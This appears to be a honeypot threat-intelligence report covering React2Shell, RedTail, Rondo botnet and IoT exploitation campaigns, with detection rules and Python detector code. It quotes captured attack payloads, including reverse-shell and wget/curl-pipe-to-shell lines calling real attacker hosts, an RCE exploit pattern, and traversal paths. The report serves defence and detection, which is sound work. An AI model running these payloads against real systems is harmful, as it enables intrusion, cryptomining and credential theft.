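    expect, user = None, None  # AUTH LOGIN state: which base64 token the client owes next
    for role, text in lines:
        upper = text.upper()
        if role == "S":
            if upper.startswith("334 "):
                challenge = (_b64(text[4:]) or "").lower()   # "Username:" or "Password:"
                expect = "user" if challenge.startswith("user") else "pass"
            elif expect:
                expect = None  # 235 (accepted) or 535 (rejected) closes the exchange
            continue
        if expect == "user":
            user = _b64(text)
        elif expect == "pass":
            creds.append((user, _b64(text)))
        elif upper.startswith("MAIL FROM:"):
            mail_from.append(_address(text))
        elif upper.startswith("RCPT TO:"):
            rcpt_to.append(_address(text))

    foreign_rcpt = any(r.rsplit("@", 1)[-1] not in LOCAL_DOMAINS for r in rcpt_to)
    if creds:
        kind = "auth_bruteforce"
    elif mail_from and (set(mail_from) & RELAY_PROBE_SENDERS or foreign_rcpt):
        kind = "relay_probe"       # unauthenticated sender asking us to deliver elsewhere
    elif rcpt_to:
        kind = "inbound_delivery"  # candidate phishing mail aimed at our own domain
    else:
        kind = "recon"
    return {"source_ip": source_ip, "kind": kind, "credentials": creds,
            "mail_from": mail_from, "rcpt_to": rcpt_to}


def triage(transcript):
    """Triage every session in a transcript."""
    return [triage_session(ip, lines) for ip, lines in parse_sessions(transcript)]


def top_credentials(results, n=5):
    """Most frequently attempted (user, password) pairs across all sessions."""
    return Counter(pair for r in results for pair in r["credentials"]).most_common(n)
```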


Observed Campaign: React2Shell Exploitation (CVE-2025-55182)

Vulnerability: React Server Components RCE
Risk Level: CRITICAL
Status: ACTIVE
Period: 2025-12-17 → 2025-12-27
Total Events: 223+ (IDS-confirmed attacks)

Baysec honeypots captured 223+ confirmed React2Shell (CVE-2025-55182) exploit attempts from 26 unique source IPs across 11 days. Activity is persistent automated mass scanning with payloads containing active C2 callbacks, staged malware downloads, and reverse shell commands - clear evidence of weaponized exploitation beyond vulnerability scanning.

C2 INFRASTRUCTURE:

  • Staging: 94.154.35.154/weball.sh - post-exploitation script
  • Reverse Shell: 193.142.147.209:12323 - active listener
  • Malware Delivery: 5.255.121.141 - binary payload server

Attack Volume & Source IPs

| Source IP | Country | Events | Role |
|---|---|---|---|
| 95.214.55.246 | 🇵🇱 Poland | 78 | Primary scanner (persistent 11-day campaign) |
| 193.142.147.209 | 🇳🇱 Netherlands | 67 | C2 operator - reverse shell target (port 12323) |
| 45.154.98.124 | 🇳🇱 Netherlands | 31 | Actor 2 - uses 5.255.121.141 payload server |
| 5.187.35.21 | 🇪🇸 Spain | 14 | Vulnerability scanner (Go-http-client) |
| 130.12.180.207 | 🇺🇸 USA | 5 | Low-volume scanner |
| 192.159.99.95 | 🇬🇧 UK | 4 | Multi-vector scanner |
| 194.127.199.125 | 🇱🇺 Luxembourg | 2 | Reconnaissance |
| 195.24.237.218 | 🇷🇺 Russia | 2 | Reconnaissance |
| 216.250.122.216 | 🇺🇸 USA | 2 | Reconnaissance |
| 84.234.98.89 | 🇸🇪 Sweden | 2 | Reconnaissance |
| 170.64.136.199 | 🇺🇸 USA (DO) | 1 | DigitalOcean scanner |
| 170.64.145.146 | 🇺🇸 USA (DO) | 1 | DigitalOcean scanner |
| 170.64.193.109 | 🇺🇸 USA (DO) | 1 | DigitalOcean scanner |
| 170.64.204.250 | 🇺🇸 USA (DO) | 1 | DigitalOcean scanner |
| 209.38.18.241 | 🇺🇸 USA (DO) | 1 | DigitalOcean scanner |
| 209.38.23.246 | 🇺🇸 USA (DO) | 1 | DigitalOcean scanner |

Timeline: 2025-12-17 → 2025-12-27 UTC (sustained 11-day campaign with daily activity)

C2 Infrastructure

Two distinct threat actors identified:

| Indicator | Type | Actor | Usage |
|---|---|---|---|
| http://94.154.35.154/weball.sh | Staging URL | Actor 1 | Shell script download |
| 193.142.147.209:12323 | C2 Callback | Actor 1 | Reverse shell listener |
| http://5.255.121.141/nuts/... | Payload URL | Actor 2 | Binary payload download |
| 45.154.98.124 | Scanner | Actor 2 | Primary operator |
| weball.sh, /tmp/x.sh | Payloads | Actor 1 | Post-exploitation scripts |
| /tmp/lrt, /dev/lrt, /dev/shm/lrt | Binary | Actor 2 | Staged binary locations |

Actor 2 Characteristics:

  • Uses distinctive boundary marker (see IoCs below)
  • Downloads binary from 5.255.121.141
  • Writes to multiple locations (/tmp/lrt, /dev/lrt, /dev/shm/lrt) for persistence
  • Makes binary executable and runs in background

Targeted Endpoints

Attackers probed multiple paths across standard and non-standard ports:

| Endpoint | Ports Targeted |
|---|---|
| / | 80, 88, 445 |
| /api | 80, 88 |
| /api/route | 80 |
| /app | 80, 88 |
| /_next | 80, 88 |
| /_next/server | 80, 88 |

Exploit Technique

Attack Vector: RSC serialization exploitation via prototype pollution

Exploit Pattern (canonical):

{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "_response": {
    "_prefix": "process.mainModule.require('child_process').execSync('...')",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}

RCE Payload Example (captured):

cd /tmp; wget -O /tmp/x.sh http://94.154.35.154/weball.sh;
chmod +x /tmp/x.sh; sh /tmp/x.sh;
rm /tmp/f; mkfifo /tmp/f;
cat /tmp/f|/bin/sh -i 2>&1|nc 193.142.147.209 12323 >/tmp/f

HTTP Indicators (Detection Signatures)

Custom Headers (HIGH confidence):

| Header | Value Pattern | Occurrences | Notes |
|---|---|---|---|
| Next-Action | x | 39 | RSC action trigger |
| Accept | text/x-component | Rare | RSC-specific content type |
| Content-Type | multipart/form-data; boundary=... | All | Custom boundary patterns |

Boundary Marker Variants (Actor Fingerprints):

| Boundary Pattern | Actor | Notes |
|---|---|---|
| WebKitFormBoundaryx8jO2oVc6SWP3Sad | Actor 1 | Used with weball.sh payload |
| WebKitFormBoundaryxtherespoopalloverme | Actor 2 | Distinctive boundary marker |
| WebKitFormBoundaryx883003851297 | Variant | Numeric suffix pattern |
| B1766123121029386113 | Probe | Timestamp-based boundary |

Boundary Pattern Analysis:

The distinctive boundary markers indicate:

  1. A specific exploit toolkit or threat actor
  2. Actor 2 downloads a binary payload rather than shell scripts

Targeted Ports (non-standard):

  • Port 80 (standard HTTP)
  • Port 88 (Kerberos - commonly exposed)
  • Port 445 (SMB - probing for web services on Windows)

User-Agents Observed:

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (Chrome/Edge)  # Most common
Go-http-client/1.1                                                          # 5.187.35.21
Mozilla/5.0 (Linux; Android 14; SM-F9560 Build/UP1A.231005.007; wv)         # Samsung Galaxy Z Fold
Mozilla/5.0 (iPhone; CPU iPhone OS 17_7...) CriOS/134.0.6998.99             # iOS Chrome
Mozilla/5.0 (Linux; U; Android 4.2.2; he-il; NEO-X5-116A Build/JDQ39)       # Old Android TV box
Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36                 # ChromeOS
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136
Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36                       # Generic Android
Mozilla/5.0                                                                 # Minimal

User-Agent Analysis: The variety of User-Agents (desktop, mobile, ChromeOS, Android TV) indicates the scanning toolkit rotates UAs to evade detection. The SM-F9560 (Samsung Galaxy Z Fold 6) and NEO-X5 (Android TV box) are unusual and may indicate spoofing or compromised devices.

Detection Signatures

Detection Strings (regex):

\$1:__proto__:then
\$1:constructor:constructor
process\.mainModule\.require\('child_process'\)
throw Object\.assign\(new Error\('NEXT_REDIRECT'\)
wget.*weball\.sh
nc\s+\d{1,3}(\.\d{1,3}){3}\s*12323

Detection Rules

IDS Rule:

alert http any any -> any any (msg:"React2Shell CVE-2025-55182 Exploit Attempt";
  flow:established,to_server; content:"POST"; http_method;
  content:"$1:__proto__:then"; http_client_body;
  content:"constructor:constructor"; http_client_body;
  classtype:web-application-attack; sid:2025551820; rev:1;)

WAF Rule:

Block if:
  HTTP POST AND
  Content-Type contains "multipart/form-data" AND
  Body matches /(\$1:__proto__:then|\$1:constructor:constructor|process\.mainModule)/

Network-Level Indicators:

  • Block egress to 193.142.147.209:12323 (reverse shell)
  • Block downloads from 94.154.35.154/weball.sh and 5.255.121.141
  • Alert on distinctive boundary markers (see IoC table)
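The detection strings, header indicators, boundary fingerprints and WAF rule above can be combined into one request-scoring routine, shown here as an added example that is not Baysec's detection code. It takes a request as (method, headers, body); both sample requests are constructed, the malicious one from the canonical exploit pattern and the Actor 2 boundary marker documented above.

```python
"""Score HTTP requests against the React2Shell (CVE-2025-55182) indicators listed above.

Added example, not Baysec's code. It applies the page's regex detection strings, the
Next-Action / text/x-component header indicators and the actor boundary fingerprints to
a request given as (method, headers, body), and reproduces the WAF block decision.
"""
import re

# Detection strings from the section above, plus the process.mainModule term of the WAF rule.
BODY_PATTERNS = {
    "rsc_proto_then": re.compile(r"\$1:__proto__:then"),
    "rsc_constructor": re.compile(r"\$1:constructor:constructor"),
    "child_process": re.compile(r"process\.mainModule\.require\('child_process'\)"),
    "next_redirect": re.compile(r"throw Object\.assign\(new Error\('NEXT_REDIRECT'\)"),
    "weball_staging": re.compile(r"wget.*weball\.sh"),
    "reverse_shell": re.compile(r"nc\s+\d{1,3}(\.\d{1,3}){3}\s*12323"),
    "main_module": re.compile(r"process\.mainModule"),
}
WAF_BLOCK_TERMS = ("rsc_proto_then", "rsc_constructor", "main_module")

# Boundary markers attributed to actors in the fingerprint table above.
BOUNDARY_FINGERPRINTS = {
    "WebKitFormBoundaryx8jO2oVc6SWP3Sad": "Actor 1",
    "WebKitFormBoundaryxtherespoopalloverme": "Actor 2",
}


def _header(headers, name):
    """Case-insensitive header lookup; None when absent."""
    return next((v for k, v in headers.items() if k.lower() == name.lower()), None)


def analyze_request(method, headers, body):
    """Return {"hits": [...], "actor": str or None, "block": bool} for one request."""
    hits = [name for name, rx in BODY_PATTERNS.items() if rx.search(body)]
    content_type = _header(headers, "Content-Type") or ""
    if _header(headers, "Next-Action") is not None:
        hits.append("next_action_header")
    if (_header(headers, "Accept") or "").startswith("text/x-component"):
        hits.append("rsc_accept_header")

    # Actor attribution from the multipart boundary, whatever the leading dashes.
    actor = next((who for marker, who in BOUNDARY_FINGERPRINTS.items()
                  if marker in content_type), None)

    # WAF rule from the section above: POST + multipart/form-data + one of the body terms.
    block = (method.upper() == "POST"
             and "multipart/form-data" in content_type.lower()
             and any(term in hits for term in WAF_BLOCK_TERMS))
    return {"hits": hits, "actor": actor, "block": block}


# Constructed sample: exploit-shaped request built from the canonical pattern above
# (the command inside execSync is left elided, as on the page).
MALICIOUS_REQUEST = (
    "POST",
    {"Next-Action": "x",
     "Accept": "text/x-component",
     "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryxtherespoopalloverme"},
    '{"then":"$1:__proto__:then","status":"resolved_model","_response":{'
    '"_prefix":"process.mainModule.require(\'child_process\').execSync(\'...\')",'
    '"_formData":{"get":"$1:constructor:constructor"}}}',
)

# Constructed sample: an ordinary server-action call with a browser-style boundary.
BENIGN_REQUEST = (
    "POST",
    {"Next-Action": "a1b2c3",
     "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryAbc123"},
    '["$K1",{"name":"Ada"}]',
)

if __name__ == "__main__":
    for label, req in (("malicious", MALICIOUS_REQUEST), ("benign", BENIGN_REQUEST)):
        print(label, analyze_request(*req))
```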

Assessment

| Factor | Finding |
|---|---|
| Attack type | Automated mass exploitation |
| Sophistication | MEDIUM (public PoC + custom staging) |
| C2 presence | CONFIRMED (staging + reverse shell) |
| Successful exploitation | NOT CONFIRMED in honeypot (designed to fail) |
| Risk to production | HIGH for unpatched Next.js/RSC |
| Attribution | Opportunistic criminal scanning (no APT indicators) |

Threat Actor Analysis: Opportunistic, automated scanning tools drive this activity, quickly incorporating CVE-2025-55182 post-disclosure. The variety of User-Agents and targeted endpoints indicates broad scanning. RCE payloads with C2 callbacks show attackers seek persistent access, not just vulnerability identification.

References
  • Baysec honeypot events (2025-12-17 → 2025-12-27)
  • CVE-2025-55182 public PoCs (GitHub)
  • Captured payloads and request bodies

Observed Campaign: RedTail Cryptominer & PHP CGI Exploitation (CVE-2024-4577)

Vulnerability: PHP CGI Argument Injection + Docker API targeting
Risk Level: CRITICAL
Status: ACTIVE
Period: 2025-12-17 → 2025-12-27
Total Events: 1,276+ (libredtail-http user-agent signature)

Baysec web honeypot captured 1,276+ exploitation attempts from 30+ unique source IPs (including IPv6) over 11 days, revealing four distinct threat patterns: mass exploitation of CVE-2024-4577 (PHP CGI Argument Injection), PHPUnit RCE exploitation (CVE-2017-9841), ThinkPHP RCE (CVE-2018-20062), and Docker API targeting.

Key Finding: RedTail operators demonstrate multi-vector capability, combining PHP exploitation with Docker API targeting and systematic credential harvesting. IPv6 infrastructure detected - attackers use 2001:41d0:601:1100::779b as primary scanner (162 events).

CVE-2024-4577 Mass Exploitation

Vulnerability Profile:

| Attribute | Value |
|---|---|
| CVE | CVE-2024-4577 |
| CVSS v3 | 9.8 CRITICAL |
| EPSS | 94.37% (Top 0.04%) |
| Type | PHP CGI Argument Injection (Windows) |
| Status | CISA KEV Listed |

Attack Vector Observed:

GET /cgi-bin/%%32%65%%32%65/.../bin/sh
GET /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input
POST: <?php shell_exec(base64_decode("(wget --no-check-certificate -qO-
      https://178.16.55.224/sh || curl -sk https://178.16.55.224/sh)
      | sh -s cve_2024_4577.selfrep")); ?>
User-Agent: libredtail-http

C2 Infrastructure: 178.16.55.224 (USA, Railnet LLC) - 15 malicious detections on VirusTotal, self-signed certificate infrastructure.

RedTail Cryptominer - PHP CGI & Docker API Targeting

Evolution Assessment: RedTail has expanded from traditional cryptomining operations to targeting containerized infrastructure via exposed Docker APIs. Security researchers first described this tactical evolution in public reporting in November 2025.

| Source IP | Country | Events | Role |
|---|---|---|---|
| 2001:41d0:601:1100::779b | 🇫🇷 France (IPv6) | 162 | Primary scanner - IPv6 infrastructure |
| 163.5.148.15 | 🇫🇷 France | 94 | PHP CGI + PHPUnit RCE scanner |
| 62.146.234.188 | 🇩🇪 Germany | 72 | Multi-vector scanner |
| 152.42.188.148 | 🇸🇬 Singapore | 66 | PHP CGI exploitation |
| 178.128.89.216 | 🇸🇬 Singapore | 66 | PHP CGI exploitation |
| 103.168.91.76 | Unknown | 47 | PHPUnit RCE scanner |
| 144.126.203.185 | 🇺🇸 USA | 47 | Multi-vector scanner |
| 152.69.216.125 | 🇺🇸 USA | 47 | PHP CGI exploitation |
| 157.173.105.78 | 🇬🇧 UK | 47 | PHPUnit RCE scanner |
| 158.220.81.232 | 🇨🇭 Switzerland | 47 | PHP CGI probing |
| 165.154.231.140 | 🇨🇦 Canada | 47 | Multi-vector scanner |
| 173.249.5.123 | 🇩🇪 Germany | 47 | Multi-vector scanner |
| 207.244.246.26 | 🇺🇸 USA | 47 | PHP CGI exploitation |
| 216.108.237.50 | 🇺🇸 USA | 47 | PHP CGI exploitation |
| 217.154.69.208 | 🇬🇧 UK | 47 | PHPUnit RCE scanner |
| 45.192.10.196 | 🇿🇦 South Africa | 47 | PHP CGI exploitation |

Timeline: 2025-12-17 → 2025-12-27 UTC (continuous 11-day campaign with daily activity)

Significance: RedTail’s pivot to Docker infrastructure indicates opportunistic targeting of cloud-native environments. Organizations with exposed Docker APIs face dual risk: cryptomining resource abuse and potential container escape. Activity is geographically distributed across 9 countries with no single dominant source.

Credential Harvesting Campaign

Attribution: Russian-nexus infrastructure (operators host via UK proxy)
Primary Sources: 78.153.140.179, 78.153.140.224
Events: 61 combined

Targeted Paths:

/secrets/aws/session.yml
/private/.env.production
/staging/.env.production
/config/aws_settings.php
/aws/konfig/aws_auth.php
/.env

Assessment: Systematic enumeration targeting AWS credentials and application secrets. Pattern indicates automated tooling scanning for misconfigured deployments.

PHP Framework Exploitation

Multiple PHP framework RCE attempts captured:

| Framework | Exploit Path | Risk |
|---|---|---|
| ThinkPHP | /index.php?s=/index/\think\app/invokefunction | RCE |
| PHPUnit | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | RCE |
| Pearcmd | /index.php?lang=/../../../usr/local/lib/php/pearcmd | RCE |

Attack Source Analysis

| Source IP | Country | Events | Activity |
|---|---|---|---|
| 163.5.148.15 | 🇫🇷 France | 44 | RedTail scanner |
| 173.249.5.123 | Unknown | 44 | Multi-vector scanning |
| 78.153.140.179 | 🇷🇺 Russia (UK hosted) | 31 | Credential harvesting |
| 78.153.140.224 | 🇷🇺 Russia (UK hosted) | 30 | Credential harvesting |
| 188.237.58.92 | 🇲🇩 Moldova | 16 | Protocol attacks |

Detection Signatures

User-Agent Detection:

libredtail-http                              # RedTail fingerprint
Mozilla/5.0 (compatible; CensysInspect/1.1)  # Reconnaissance
Mozilla/5.0 zgrab/0.x                        # Zgrab scanner

Path-Based Detection (WAF/IDS):

.*\.env.*
.*eval-stdin\.php.*
.*think\\app.*invokefunction.*
.*pearcmd.*
.*allow_url_include.*

Risk Assessment

| Threat | Severity | EPSS/Likelihood | Impact |
|---|---|---|---|
| CVE-2024-4577 | CRITICAL | 94.37% | RCE, full system compromise |
| RedTail Docker | HIGH | MEDIUM | Cryptomining, container escape |
| Credential Harvesting | HIGH | HIGH | AWS account compromise |
| PHP Framework RCE | HIGH | MEDIUM | Application takeover |
References

Observed Campaign: Cisco VPN (AnyConnect) Probing (CVE-2020-3452)

Threat Type: Vulnerability Reconnaissance
Risk Level: MEDIUM
Status: ACTIVE
Period: 2025-12-17 → 2025-12-27
Total Events: 73

Baysec honeypots captured 73 probing attempts targeting Cisco AnyConnect VPN infrastructure from 19 unique source IPs - all originating from DigitalOcean infrastructure. The coordinated nature (4 events per IP, identical patterns) indicates automated reconnaissance tooling.

Targeted Endpoints
| Path | Events | Purpose |
|---|---|---|
| /+CSCOL+/Java.jar | 19 | Java applet exploitation attempt |
| /+CSCOE+/logon_forms.js | 18 | Login form fingerprinting |
| /+CSCOE+/transfer.js | 18 | File transfer probe |
| /+CSCOL+/a1.jar | 18 | Java applet exploitation attempt |

Source IPs (DigitalOcean Infrastructure)

| Source IP | Events | Notes |
|---|---|---|
| 104.248.12.12 | 4 | DigitalOcean NYC |
| 129.212.227.133 | 4 | DigitalOcean |
| 137.184.178.219 | 4 | DigitalOcean NYC |
| 137.184.254.136 | 4 | DigitalOcean NYC |
| 137.184.26.12 | 4 | DigitalOcean NYC |
| 138.68.141.22 | 4 | DigitalOcean NYC |
| 147.182.254.157 | 4 | DigitalOcean |
| 159.223.107.241 | 4 | DigitalOcean SF |
| 162.243.96.90 | 4 | DigitalOcean NYC |
| 165.22.228.96 | 4 | DigitalOcean |
| 170.64.138.231 | 4 | DigitalOcean SFO |
| 178.128.242.60 | 4 | DigitalOcean LON |
| 178.128.86.240 | 4 | DigitalOcean AMS |
| 206.189.40.243 | 4 | DigitalOcean NYC |
| 209.38.28.134 | 4 | DigitalOcean |
| 64.225.120.136 | 4 | DigitalOcean NYC |
| 64.225.51.246 | 4 | DigitalOcean NYC |
| 64.227.39.136 | 4 | DigitalOcean NYC |
| 134.209.7.54 | 1 | DigitalOcean |

Assessment

Pattern Analysis:

  • All 19 IPs performed exactly 4 requests (one per path)
  • All hosted on DigitalOcean infrastructure
  • Targeting Cisco AnyConnect SSL VPN authentication/Java components
  • Indicative of vulnerability scanning for CVE-2020-3452 (Cisco ASA Path Traversal) or similar

Risk: Organizations running Cisco ASA/FTD with AnyConnect should:

  • Ensure patched against CVE-2020-3452 (CVSS 7.5)
  • Monitor for /+CSCOE+/ and /+CSCOL+/ path access
  • Block DigitalOcean ranges if not expected traffic source

Observed Campaign: Rondo Botnet (Mirai Variant)

Threat Type: IoT Botnet / Multi-Vector Scanner
Risk Level: HIGH
Status: ACTIVE
Period: 2025-12-17 → 2025-12-27
Events: 441+

Baysec honeypots captured 441+ exploitation attempts from the Rondo botnet, a Mirai variant targeting IoT devices and web applications. The botnet employs multiple attack vectors simultaneously, including Shellshock (CVE-2014-6271), PHPUnit RCE (CVE-2017-9841), and OpenWRT LuCI command injection (CVE-2023-1389).

Key Finding: Rondo operators embed their email attribution signature (rondo2012@atomicmail.io) directly in User-Agent strings and Shellshock payloads - unusual OPSEC failure suggesting amateur operators or deliberate false flag.

Attack Infrastructure
| Component | Value | Notes |
|---|---|---|
| Primary Scanner | 192.159.99.95 | United Kingdom |
| C2/Payload Server | 41.231.37.153 | Tunisia (Tunisie Telecom) |
| Contact Email | rondo2012@atomicmail.io | Embedded in payloads |
| Payload Scripts | rondo.*.sh | Multiple variants |

Exploitation Vectors

1. Shellshock (CVE-2014-6271) - User-Agent Injection:

User-Agent: () { :; }; /bin/bash -c "(wget -qO- http://41.231.37.153/rondo.ame.sh||busybox wget -qO- http://41.231.37.153/rondo.ame.sh||curl -s http://41.231.37.153/rondo.ame.sh)|sh"& # rondo2012@atomicmail.io

Targets: /cgi-bin/slogin/login.py, /cgi-bin/jarrewrite.sh

2. OpenWRT LuCI Command Injection (CVE-2023-1389):

GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=`busybox wget -qO- http://41.231.37.153/rondo.zqq.sh|sh`
User-Agent: Mozilla/5.0 (rondo2012@atomicmail.io)

3. PHPUnit RCE (CVE-2017-9841):

POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
Body: <?php system('(wget -qO- http://41.231.37.153/rondo.dtm.sh||busybox wget -qO- http://41.231.37.153/rondo.dtm.sh||curl -s http://41.231.37.153/rondo.dtm.sh)|sh&'); ?>

Payload Variants Observed

| Script | Target CVE | Description |
|---|---|---|
| rondo.ame.sh | CVE-2014-6271 | Shellshock exploitation |
| rondo.fve.sh | CVE-2014-6271 | Shellshock variant |
| rondo.qre.sh | CVE-2014-6271 | Shellshock variant |
| rondo.zqq.sh | CVE-2023-1389 | OpenWRT LuCI injection |
| rondo.dtm.sh | CVE-2017-9841 | PHPUnit exploitation |

Detection Signatures

# User-Agent patterns
rondo2012@atomicmail\.io
Mozilla/5\.0 \(rondo2012@

# URL patterns
41\.231\.37\.153/rondo\.\w+\.sh

# Shellshock in headers
\(\)\s*\{\s*:\s*;\s*\}\s*;

Assessment: Rondo represents opportunistic mass scanning targeting legacy vulnerabilities in IoT devices. The embedded email signature and use of decade-old CVEs suggest low-sophistication operators. Primary risk is to unpatched routers and IoT devices that may be enrolled into DDoS botnets or cryptomining operations.


Observed Campaign: IoT & Network Device Exploitation

Threat Type: Multi-CVE Device Targeting
Risk Level: HIGH
Status: ACTIVE
Period: 2025-12-17 → 2025-12-27
Events: 965+

Baysec honeypots captured 965+ exploitation attempts targeting IoT devices, network equipment, and exposed management interfaces. Attackers systematically probe for vulnerable Hikvision cameras, GPON routers, D-Link devices, and enterprise infrastructure.

Hikvision SDK Reconnaissance (CVE-2021-36260)

Vulnerability: Scanning for Command Injection endpoint
CVSS: 9.8 CRITICAL
Events: 18

Attackers probe for the /SDK/webLanguage endpoint to identify Hikvision cameras vulnerable to CVE-2021-36260. All captured requests were GET-based reconnaissance - no command injection payloads observed.

| Source IP | Country | Events | First Seen | Last Seen |
|---|---|---|---|---|
| 89.42.231.239 | 🇷🇴 Romania | 11 | Dec 17 | Dec 26 |
| 5.187.35.158 | 🇳🇱 Netherlands | 7 | Dec 21 | Dec 27 |

Request Pattern:

GET /SDK/webLanguage HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46

GPON Router Reconnaissance

Scanning for: GPON Home Gateway vulnerabilities (CVE-2018-10561)
Events: 47

GET /GponForm/diag_Form?images/

Probing for vulnerable GPON routers. No command injection payloads observed.

Scanning for: D-Link HNAP interface
Events: 30

GET /HNAP1
GET /HNAP1/

Probing for D-Link routers with HNAP enabled. No SOAPAction exploitation payloads observed.

Apache Solr Reconnaissance

Scanning for: Apache Solr instances
Events: 109

| Endpoint | Events | Purpose |
|---|---|---|
| /solr/admin/info/system | 64 | Version fingerprinting |
| /solr/admin/cores?action=STATUS&wt=json | 45 | Core enumeration |

Docker Registry Reconnaissance

Scanning for: Exposed Docker registries
Events: 63

GET /v2/_catalog
GET /containers/json

Probing for unauthenticated Docker API access.

SAP NetWeaver Reconnaissance (CVE-2025-31324)

Scanning for: Vulnerable metadatauploader endpoint
CVSS: 10.0 CRITICAL
Events: 24

GET /developmentserver/metadatauploader

Probing for SAP NetWeaver instances. No file upload payloads observed.

GeoServer Reconnaissance (CVE-2024-36401)

Scanning for: GeoServer instances
CVSS: 9.8 CRITICAL
Events: 18

GET /geoserver/web/

Probing for GeoServer installations. No SQL injection payloads observed.

Apache Path Traversal (CVE-2021-41773 / CVE-2021-42013)

Vulnerability: Path Traversal → RCE via mod_cgi
CVSS: 9.8 CRITICAL
Events: 402

| Pattern | Events | Technique |
|---|---|---|
| /cgi-bin/%%32%65%%32%65/... | 75 | Double URL-encoded traversal |
| /cgi-bin/.%2e/.%2e/... | 75 | URL-encoded dot traversal |
| /cgi-bin/.%%32%65/... | 17 | Mixed encoding |

Attack Payload (captured):

GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1

This traverses to /bin/sh on vulnerable Apache 2.4.49/2.4.50 servers.
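The three encodings in the table above (double, single and mixed) all collapse to ".." once a path is percent-decoded until it stops changing; the same applies to the double-encoded /cgi-bin/%%32%65%%32%65/ probe in the PHP CGI section. The following normalizer is an added example, not Baysec's tooling: it decodes iteratively, counts ".." segments and checks whether the request climbs above the web root. The decode-round cap and the flagging rule are its own choices.

```python
"""Detect path traversal hidden under single, double and mixed URL encoding.

Added example, not Baysec's code. Percent-decode until the path is stable, then walk the
segments to see whether ".." climbs above the web root. CAPTURED_APACHE_PATH is the
request path quoted in the section above; the other sample paths are constructed.
"""
from urllib.parse import unquote

MAX_DECODE_ROUNDS = 5   # double/mixed encoding needs 2; the cap bounds pathological input

# Captured request path from the section above (CVE-2021-41773 / CVE-2021-42013).
CAPTURED_APACHE_PATH = (
    "/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/"
    "%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh"
)


def normalize_path(raw_path):
    """Percent-decode repeatedly; return (decoded_path, number_of_rounds_that_changed_it)."""
    path, rounds = raw_path, 0
    while rounds < MAX_DECODE_ROUNDS:
        decoded = unquote(path)   # "%%32%65" -> "%2e" -> "." over two rounds
        if decoded == path:
            break
        path, rounds = decoded, rounds + 1
    return path, rounds


def analyze_path(raw_path):
    """Classify one request path and report how it was encoded and where it leads."""
    decoded, rounds = normalize_path(raw_path)
    depth, dot_segments, escapes_root = 0, 0, False
    for segment in decoded.split("?", 1)[0].split("/"):
        if segment in ("", "."):
            continue
        if segment == "..":
            dot_segments += 1
            if depth == 0:
                escapes_root = True   # more ".." than directories entered: leaves the root
            else:
                depth -= 1
        else:
            depth += 1
    return {
        "raw": raw_path,
        "decoded": decoded,
        "decode_rounds": rounds,
        "multi_encoded": rounds > 1,   # a second decode still changed the path: layered encoding
        "dot_segments": dot_segments,
        "escapes_root": escapes_root,
        "flagged": dot_segments > 0,   # any ".." reaching a CGI handler is worth an alert
    }


if __name__ == "__main__":
    for p in (CAPTURED_APACHE_PATH, "/cgi-bin/.%2e/.%2e/bin/sh",
              "/cgi-bin/.%%32%65/bin/sh", "/api/v1/users%2F42?x=1"):
        print(analyze_path(p))
```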

| Source IP | Country | Events |
|---|---|---|
| 192.159.99.95 | 🇬🇧 UK (Rondo) | 100 |
| 147.124.204.3 | 🇺🇸 USA | 22 |
| 163.5.148.15 | 🇫🇷 France | 16 |
| 87.121.84.181 | 🇧🇬 Bulgaria | 15 |

QNAP NAS Exploitation (CVE-2024-21899)

Vulnerability: Improper Authentication (CVE-2024-21899)
CVSS: 9.8 CRITICAL
Events: 52

GET /cgi-bin/authLogin.cgi

Attackers probe for QNAP NAS devices vulnerable to authentication bypass allowing unauthenticated access to device management.

InfluxDB Information Disclosure (CVE-2019-20933)

Vulnerability: Authentication Bypass (CVE-2019-20933)
CVSS: 9.8 CRITICAL
Events: 42

GET /query?q=SHOW+DIAGNOSTICS

Attackers probe for unauthenticated InfluxDB instances to extract internal configuration, credentials, and time-series data.

Realtek SDK Router Exploitation (CVE-2021-35395)

Vulnerability: Buffer Overflow leading to RCE (CVE-2021-35395)
CVSS: 9.8 CRITICAL
Events: 42

| Endpoint | Credentials | Events |
|---|---|---|
| /boaform/admin/formLogin | (none) | 24 |
| /boaform/admin/formLogin?username=ec8&psd=ec8 | ec8:ec8 | 9 |
| /boaform/admin/formLogin?username=user&psd=user | user:user | 9 |

Targets routers with Realtek SDK - common in low-cost SOHO devices.

Netgear Router Exploitation

Vulnerability: Command Injection (CVE-2016-1555)
Events: 22

GET /cgi-bin/main-cgi

Miscellaneous Router CGI Attacks

| Endpoint | Events | Target |
|---|---|---|
| /apply.cgi | 42 | Generic router config |
| /cgi-bin/login | 28 | Authentication probe |
| /cgi-bin/httpd.cgi | 12 | Various routers |
| /cgi-bin/login.cgi | 11 | Authentication probe |
| /cgi-bin/system_mgr.cgi | 9 | System management |

WinRM Exploitation

Protocol: Windows Remote Management
Events: 219
Period: Dec 17 → Dec 26

| Source IP | Country | Events |
|---|---|---|
| 103.203.76.79 | 🇮🇳 India | 13 |
| 108.216.136.255 | 🇺🇸 USA | 13 |
| 111.92.61.249 | 🇮🇳 India | 13 |
| 113.160.1.118 | 🇻🇳 Vietnam | 13 |
| 114.143.212.195 | 🇮🇳 India | 13 |
| 117.192.9.243 | 🇮🇳 India | 13 |
| 124.106.67.118 | 🇵🇭 Philippines | 13 |
